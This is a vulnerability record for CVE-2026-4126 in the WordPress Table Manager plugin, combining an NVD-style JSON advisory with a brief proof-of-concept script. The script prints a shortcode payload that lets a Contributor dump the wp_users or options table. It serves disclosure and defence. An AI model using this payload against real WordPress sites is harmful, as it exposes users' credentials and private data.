CVE-2026-4126

# Exploit Title: WordPress Table Manager <= 1.0.0 - Sensitive Information Exposure (PoC) # Description: This shortcode demonstrates how to leak data from the wp_users table. # Usage: Insert the following shortcode into a post or page content as a Contributor user. # Malicious Shortcode Payload # The plugin appends the table prefix (e.g., wp_) to the provided value. # To dump the users table, we use 'users'. payload = "[table_manager table='users']" # Alternatively, to access options table: # payload = "[table_manager table='options']" print(f"Insert this shortcode into a post content: {payload}")

{"cve": {"id": "CVE-2026-4126", "sourceIdentifier": "[email protected]", "published": "2026-04-22T09:16:23.777", "lastModified": "2026-04-22T20:22:50.570", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Table Manager plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.0 via the 'table_manager' shortcode. The shortcode handler `tablemanager_render_table_shortcode()` takes a user-controlled `table` attribute, applies only `sanitize_key()` for sanitization, and concatenates the value with `$wpdb->prefix` to form a full database table name. It then executes `DESC` and `SELECT *` queries against this table and renders all rows and columns to the frontend. There is no allowlist check to ensure only plugin-created tables can be accessed — the `tablemanager_created_tables` option is only referenced in admin functions, never in the shortcode handler. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive data from arbitrary WordPress database tables."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/table-manager/tags/1.0.0/table-manager.php#L561", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/table-manager/tags/1.0.0/table-manager.php#L572", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/table-manager/tags/1.0.0/table-manager.php#L573", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/table-manager/trunk/table-manager.php#L561", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/table-manager/trunk/table-manager.php#L572", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/table-manager/trunk/table-manager.php#L573", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/25b3607c-f99e-4359-8228-0f3452f80aac?source=cve", "source": "[email protected]"}]}}